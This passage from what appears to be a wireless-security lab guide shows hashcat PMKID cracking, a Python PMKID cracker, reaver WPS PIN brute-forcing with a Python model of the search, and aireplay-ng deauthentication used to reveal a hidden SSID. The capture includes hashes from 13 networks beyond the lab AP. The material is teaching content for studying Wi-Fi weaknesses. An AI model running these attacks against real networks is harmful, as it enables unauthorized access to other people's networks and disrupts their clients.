 2452: 302       2457: 76        2462: 224       2467: 48
 2472: 1         5180: 1220      5200: 3         5220: 164
 5240: 139       5745: 1         5765: 71        5785: 59
 5805: 95        5825: 2

session summary
---------------
processed pcapng files................: 1

Cracking PMKID

[root@wireless ~]# hashcat -m 22000 test.22000 -a 0 --kernel-accel=1 -w 4 --force '/usr/share/wordlists/rockyou.txt'

Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Fri Oct 14 01:36:27 2022, (5 mins, 54 secs)
Time.Estimated...: Tue Oct 18 11:29:14 2022, (4 days, 9 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      488 H/s (0.94ms) @ Accel:1 Loops:1024 Thr:1 Vec:8
Recovered........: 0/23 (0.00%) Digests (total), 0/23 (0.00%) Digests (new), 0/13 (0.00%) Salts
Progress.........: 496666/186477005 (0.27%)
Rejected.........: 332644/496666 (66.98%)
Restore.Point....: 38204/14344385 (0.27%)
Restore.Sub.#1...: Salt:7 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: september30 -> september22

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>

The hash file holds 23 digests from 13 networks (salts) because the capture was not filtered to the lab AP, and each candidate has to be tried against every salt; on a CPU-only rig at 488 H/s that is days of work. Two thirds of rockyou.txt are rejected because WPA-PSK passphrases must be 8 to 63 characters long. --force suppresses hashcat's safety checks and should not be needed; fix the OpenCL/driver setup instead.
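Offline PMKID cracking in Python, as an added example (not code from the workshop, hcxtools or hashcat): it computes the PMKID from the PMK and the two MACs, parses a hashcat 22000 PMKID line (WPA*01*PMKID*AP MAC*client MAC*ESSID hex***) and tests candidates, which is the per-word work of hashcat -m 22000. The sample line is constructed from the lab ESSID, the lab AP's MAC and hcxdumptool's rogue client MAC d8:5d:fb:0a:b8:97, with the assumed passphrase qwerty123; note that the client MAC is the attacker's own, which is why no real client was needed.

```python
import hashlib
import hmac
from typing import Dict, List, Optional


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32), same as for the handshake attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); the AP puts it in the RSN PMKID KDE of M1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_22000(line: str) -> Dict[str, object]:
    """hashcat 22000 line: WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID_hex*** (type 01 = PMKID, 02 = EAPOL)."""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a 22000 PMKID line")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "ap": bytes.fromhex(fields[3]),
        "sta": bytes.fromhex(fields[4]),
        "essid": bytes.fromhex(fields[5]).decode(),
    }


def crack_pmkid(line: str, wordlist: List[str]) -> Optional[str]:
    """One PBKDF2 plus one short HMAC per candidate; no nonces, no MIC, no second party."""
    h = parse_22000(line)
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:  # illegal WPA-PSK length, skip (hashcat's 'Rejected')
            continue
        pmkid = compute_pmkid(derive_pmk(cand, h["essid"]), h["ap"], h["sta"])
        if hmac.compare_digest(pmkid, h["pmkid"]):
            return cand
    return None


def make_22000_line(passphrase: str, essid: str, ap_mac: bytes, sta_mac: bytes) -> str:
    """Plays the AP: the line hcxpcapngtool would write after capturing M1 (constructed)."""
    pmkid = compute_pmkid(derive_pmk(passphrase, essid), ap_mac, sta_mac)
    return f"WPA*01*{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{essid.encode().hex()}***"


# Constructed sample: lab ESSID and AP, hcxdumptool's rogue client MAC, assumed passphrase.
SAMPLE = make_22000_line("qwerty123", "OPENSOURCE",
                         bytes.fromhex("001839e46128"), bytes.fromhex("d85dfb0ab897"))

if __name__ == "__main__":
    print(SAMPLE)
    print("recovered:", crack_pmkid(SAMPLE, ["password", "12345678", "qwerty123"]))
```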

Hacking WPS

wash lists the APs in range that advertise WPS; the Lck column shows whether the AP has locked WPS after too many failed PIN attempts, in which case reaver has to wait.

[root@wireless ~]# wash -i wlan0mon
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:22:75:E2:8C:2A    1  -50  1.0  No   RalinkTe  OPENSOURCE

reaver brute-forces the PIN online against the AP: -d 30 waits 30 seconds between attempts, -S uses small Diffie-Hellman keys to speed up each exchange, -N suppresses NACKs for out-of-order packets and -vv is verbose.

[root@wireless ~]# reaver -i wlan0mon -b 00:22:75:E2:8C:2A -d 30 -S -N -vv
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:22:75:E2:8C:2A
[+] Switching wlan0mon to channel 1
[+] Received beacon from 00:22:75:E2:8C:2A
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request

Once reaver reports the correct PIN, rerun it with -p <PIN> to have the AP hand over the WPA passphrase:

[root@wireless ~]# reaver -i wlan0mon -b 00:22:75:E2:8C:2A -p 19806716 -vv
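Why reaver needs at most 11,000 attempts instead of 10^8, as an added Python example (not code from the workshop or from reaver): the 8th PIN digit is a checksum, and the WPS exchange acknowledges the first four digits (at M4) separately from the last three (at M6). A FakeRegistrar stands in for the AP; it is constructed and also models the lockout that wash reports in the Lck column. The PIN 19806716 is the one passed to -p above; 12345670, reaver's first guess, is likewise a valid PIN.

```python
from typing import Optional


def wps_checksum_digit(first7: int) -> int:
    """The 8th PIN digit is a checksum over the first seven (weights 3,1,3,1,... from the right),
    so only 7 digits carry entropy, and the protocol lets them be guessed as 4 + 3."""
    acc, p = 0, first7
    while p:
        acc += 3 * (p % 10)
        p //= 10
        acc += p % 10
        p //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum_digit(int(pin[:7])) == int(pin[7])


class FakeRegistrar:
    """Stands in for the AP's WPS registrar (constructed, not a real AP). It answers the way the
    WPS exchange does: a wrong first half is rejected at M4, a wrong second half at M6, and the
    right PIN gets M7, which carries the WPA passphrase. lock_after models the Lck column in
    wash: after that many failures the AP stops answering."""

    def __init__(self, pin: str, lock_after: Optional[int] = None):
        assert is_valid_pin(pin)
        self._pin = pin
        self._lock_after = lock_after
        self.failures = 0
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if self._lock_after is not None and self.failures >= self._lock_after:
            return "LOCKED"
        if pin[:4] != self._pin[:4]:
            self.failures += 1
            return "NACK@M4"
        if pin[4:] != self._pin[4:]:
            self.failures += 1
            return "NACK@M6"
        return "M7"


def brute_force(reg: FakeRegistrar) -> Optional[str]:
    """reaver's search: at most 10^4 guesses for the first half, then at most 10^3 for the next
    three digits with the checksum digit computed, i.e. 11,000 PINs instead of 10^7."""
    first_half = None
    for h1 in range(10_000):
        r = reg.try_pin(f"{h1:04d}0000")   # second half is a dummy until M4 passes
        if r == "LOCKED":
            return None
        if r != "NACK@M4":
            first_half = h1
            break
    if first_half is None:
        return None
    for h2 in range(1_000):
        first7 = first_half * 1000 + h2
        pin = f"{first7:07d}{wps_checksum_digit(first7)}"
        r = reg.try_pin(pin)
        if r == "LOCKED":
            return None
        if r == "M7":
            return pin
    return None


if __name__ == "__main__":
    ap = FakeRegistrar("19806716")
    print(brute_force(ap), "after", ap.attempts, "attempts")
```

Against a real AP each attempt is a full EAP exchange (the M1..M7 messages in the reaver output), which is why -d and lockouts dominate the run time rather than the search space.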

Discovering a hidden SSID

A hidden network still sends beacons, but with the SSID field blanked out, so airodump-ng shows only its length. The name travels in clear in probe responses and in the association request of any client that connects, so it can be read from the capture as soon as a client (re)joins.

[root@wireless ~]# airodump-ng wlan0mon
CH  7 ][ Elapsed: 12 s ][ 2022-10-11 22:42                                   
    
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                         
                               
00:18:39:E4:61:28  -40        7        0    0   6   54e  WPA2 CCMP   PSK  <length: 10>                                                                                                      
62:AF:97:C2:4E:24  -34        7        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS                                                                                                           
5E:AF:97:C2:4E:24  -33        7        0    0   6  130   WPA2 CCMP   PSK  NARUTO                                                                                                            
5A:AF:97:C2:4E:24  -34        9        0    0   6  130   WPA2 CCMP   PSK  TOTORO                                                                                                            
54:AF:97:C2:4E:24  -33        9        0    0   6  130   WPA2 CCMP   PSK  YOSHI                                                                                                                                              

airodump-ng shows <length: 10> for the lab AP: the SSID is hidden and only its length (10 characters) is known so far.

Capturing packets

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w hidden-ssid wlan0mon
CH  6 ][ Elapsed: 24 s ][ 2022-10-11 22:51                                   
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                   
    
00:18:39:E4:61:28  -43 100      265        0    0   6   54e  WPA2 CCMP   PSK  <length: 10>                                                                 
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes  
[root@wireless ~]# tshark -r hidden-ssid-01.cap "wlan.ta == 00:18:39:E4:61:28"
Running as user "root" and group "root". This could be dangerous.
    2   0.055007 Cisco-Li_e4:61:28 → Broadcast    802.11 138 Beacon frame, SN=3347, FN=0, Flags=........, BI=100, SSID=\000\000\000\000\000\000\000\000\000\000 

Alternatively open the capture in Wireshark and apply the display filter below; the beacon's SSID element is ten null bytes, which is why airodump-ng reports <length: 10>.

wlan.ta==00:18:39:E4:61:28

Force the associated client to reconnect with deauth bursts (10 here); its association request carries the SSID in clear:

[root@wireless ~]# aireplay-ng -0 10 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon 
23:04:51  Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:04:52  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:52  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [118|118 ACKs]
23:04:53  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:53  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:54  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [116|116 ACKs]
23:04:55  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:55  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [114|114 ACKs]
23:04:56  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [94|94 ACKs]
23:04:56  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [143|143 ACKs]
23:04:57  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [111|111 ACKs]

When the client re-associates, airodump-ng fills in the name:

CH  6 ][ Elapsed: 6 s ][ 2022-10-11 23:38 ]                       

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
00:18:39:E4:61:28  -45 100       68       28    6   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
00:18:39:E4:61:28  16:41:DA:4E:36:EA  -43    1e- 1e   177      129  EAPOL  OPENSOURCE

MAC Address Vendors

You can use the following site to identify the vendor of a MAC address (the first three bytes are the IEEE-assigned OUI):

https://macvendors.com/

Or use the local OUI database on Kali. Entries are keyed as XX-XX-XX, so for the lab AP 00:18:39:E4:61:28 you would search for 00-18-39 (tshark already resolved it to Cisco-Linksys above):

[root@wireless ~]# grep -i <XX-XX-XX OF THE MAC ADDRESS> /var/lib/ieee-data/oui.txt

Restore the services

Stop monitor mode first (airmon-ng stop wlan0mon brings wlan0 back), then restart the services that airmon-ng check kill stopped:

[root@wireless ~]# systemctl start NetworkManager.service
[root@wireless ~]# systemctl start wpa_supplicant.service
